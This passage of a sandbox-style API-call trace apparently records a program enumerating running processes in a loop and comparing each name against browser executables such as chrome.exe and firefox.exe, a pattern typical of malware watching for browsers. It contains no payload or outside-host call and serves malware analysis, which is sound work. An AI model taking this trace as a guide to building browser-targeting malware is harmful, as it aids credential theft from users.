(lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.846] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0199.846] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0199.847] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0199.847] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0199.847] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0199.847] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.847] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0199.847] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0199.847] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0199.847] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0199.847] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0199.847] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.847] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0199.848] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0199.848] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0199.848] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0199.848] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0199.848] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.848] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0199.848] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0199.848] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0199.848] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0199.848] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0199.848] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.848] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0199.849] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0199.849] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0199.849] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0199.849] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0199.849] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.849] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0199.849] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0199.850] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0199.850] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0199.850] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0199.850] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.850] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0199.850] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0199.850] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0199.850] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0199.850] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0199.850] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.850] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0199.851] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0199.851] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0199.851] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0199.851] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0199.851] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.851] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0199.851] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0199.851] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0199.851] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0199.851] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0199.851] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.851] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0199.852] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0199.852] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0199.852] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0199.852] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0199.852] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.852] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0199.853] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0199.853] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0199.853] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0199.853] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0199.853] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.853] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0199.853] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0199.853] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0199.853] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0199.853] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0199.853] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.853] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0199.854] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0199.854] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0199.854] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0199.854] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0199.854] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.854] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0199.854] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0199.854] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0199.854] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0199.854] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0199.854] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.854] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0199.855] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0199.855] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0199.855] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0199.855] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0199.855] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.855] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0199.855] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0199.855] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0199.856] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0199.856] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0199.856] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.856] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0199.856] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0199.856] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0199.856] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0199.856] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0199.856] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.856] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0199.857] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0199.857] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0199.857] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0199.857] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0199.857] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.857] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0199.857] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0199.857] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0199.857] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0199.857] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0199.857] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.857] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.858] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0199.858] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0199.858] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0199.858] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0199.858] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.858] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.859] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.859] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.859] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.859] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.859] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.859] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0199.859] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0199.859] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0199.859] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0199.859] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0199.859] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.859] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.860] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.860] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.860] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.860] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.860] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.860] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0199.860] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0199.860] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0199.860] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0199.861] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0199.861] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.861] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.861] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0199.861] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0199.861] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0199.861] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0199.861] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.861] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.862] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0199.862] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0199.862] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0199.862] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0199.862] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.862] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0199.907] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0199.907] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0199.907] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0199.907] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0199.907] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.907] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.907] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0199.907] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0199.908] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0199.908] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0199.908] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.908] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.908] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0199.908] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0199.908] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0199.908] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0199.908] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.908] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.909] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0199.909] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.909] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.910] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0199.910] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0199.910] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0199.910] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0199.910] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0199.910] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0199.910] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0199.910] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0199.911] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0199.911] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0199.911] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0199.911] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0199.911] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0199.911] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0199.911] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0199.911] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0199.911] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0199.911] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0199.912] CloseHandle (hObject=0xe8) returned 1 [0199.912] Sleep (dwMilliseconds=0x3e8) [0200.922] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0200.924] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.924] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0200.924] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0200.924] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0200.924] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0200.924] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0200.924] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0200.925] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0200.925] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0200.925] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 